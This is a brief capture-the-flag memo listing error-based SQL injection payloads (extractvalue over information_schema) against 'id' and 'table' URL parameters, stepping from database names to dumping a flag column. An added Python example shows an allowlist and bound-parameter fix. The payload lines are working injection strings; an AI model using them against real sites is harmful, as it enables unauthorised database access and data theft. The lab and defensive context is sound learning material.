1. Database names
?id=1 and extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))#
2. Table names
?id=1 and extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))#
3. Ran into a problem when guessing the column names
?id=1 and extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))#
Testing shows the table parameter is injectable (see the writeup at http://www.bubuko.com/infodetail-2392442.html)
1. Database names
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))%23`&id=1
2. Table names
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))%23`&id=1
3. Column names
?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))%23`&id=1
4. Contents
?table=flag`%23` where 0=extractvalue(1,(select flag_you_will_never_know from error_flag))%23`&id=1
Noting this down for later reference.
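
The defensive counterpart to the `table` parameter injection above, as an added example that is not part of the original writeup: a table name cannot be bound as a query parameter, so it is resolved through a fixed allowlist while `id` is validated and bound. Assumptions: the page does not show the server code, so the query shape (`SELECT * FROM <table> WHERE id=<id>`), the table names, the demo row, and the use of sqlite3 in place of MySQL (so it runs offline) are all constructed for this example.

```python
import re
import sqlite3

# Assumption: request value -> real identifier. Only these tables are reachable.
ALLOWED_TABLES = {"flag": "flag", "news": "news"}


def build_query(table_param: str, id_param: str):
    """Return (sql, params) or raise ValueError.

    The identifier is never taken from the request text itself: the request
    value is only a lookup key into ALLOWED_TABLES. The id is checked to be
    a short decimal number and then passed as a bound parameter.
    """
    table = ALLOWED_TABLES.get(table_param)
    if table is None:
        raise ValueError("unknown table")
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        raise ValueError("id must be numeric")
    return f'SELECT * FROM "{table}" WHERE id = ?', (int(id_param),)


def fetch(conn, table_param: str, id_param: str):
    """Run the query built from validated input and return all rows."""
    sql, params = build_query(table_param, id_param)
    return conn.execute(sql, params).fetchall()


def is_rejected(table_param: str, id_param: str) -> bool:
    """True when the input pair is refused before any SQL is built."""
    try:
        build_query(table_param, id_param)
        return False
    except ValueError:
        return True


def demo_db():
    """In-memory database with one constructed row, standing in for MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flag (id INTEGER, note TEXT)")
    conn.execute("INSERT INTO flag VALUES (1, 'constructed row')")
    return conn


if __name__ == "__main__":
    print(fetch(demo_db(), "flag", "1"))
```
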